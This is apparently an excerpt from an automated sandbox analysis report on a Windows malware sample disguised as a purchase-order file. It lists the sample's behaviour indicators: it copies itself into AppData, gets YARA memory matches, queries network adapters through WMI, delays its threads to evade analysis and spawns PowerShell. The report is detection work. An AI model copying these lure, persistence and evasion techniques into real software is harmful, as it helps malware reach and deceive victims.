                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Process information set: NOOPENFILEERRORBOX (identical entry listed 58 times in the report)

                      Malware Analysis System Evasion

                      Source: Yara match - File source: Process Memory Space: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe PID: 6752, type: MEMORYSTR
                      Source: Yara match - File source: Process Memory Space: ctsdvwT.exe PID: 7060, type: MEMORYSTR
                      Source: Yara match - File source: Process Memory Space: ctsdvwT.exe PID: 6840, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Memory allocated: 1270000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Memory allocated: 2DD0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Memory allocated: 2C10000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Memory allocated: 6130000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Memory allocated: 7130000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Memory allocated: 7260000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Memory allocated: 8260000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Memory allocated: EC0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Memory allocated: 2B30000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Memory allocated: 1150000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Memory allocated: 2B10000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Memory allocated: 2CA0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Memory allocated: 4CA0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Memory allocated: 61F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Memory allocated: 71F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Memory allocated: 7330000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Memory allocated: 8330000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Memory allocated: DF0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Memory allocated: 2890000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Memory allocated: 4890000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Memory allocated: 1000000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Memory allocated: 29C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Memory allocated: 2810000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Memory allocated: 5FF0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Memory allocated: 5DC0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Memory allocated: 6FF0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Memory allocated: 7FF0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Memory allocated: 3080000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Memory allocated: 3220000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Memory allocated: 5220000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2400000
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2399868
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2399748
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2399640
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2399531
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2399419
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2399297
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2399181
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2399063
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2398938
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2398813
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2398688
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2398576
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2398396
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2398262
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2398101
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2397985
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2397860
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2397735
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2397606
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2397485
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2397360
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2397235
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2397110
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2396985
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2396860
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2396735
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2396610
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2396485
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2396360
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2396235
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2396110
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2395985
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2395860
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2395699
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2395336
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2395219
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2395109
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2394999
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2394891
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2394781
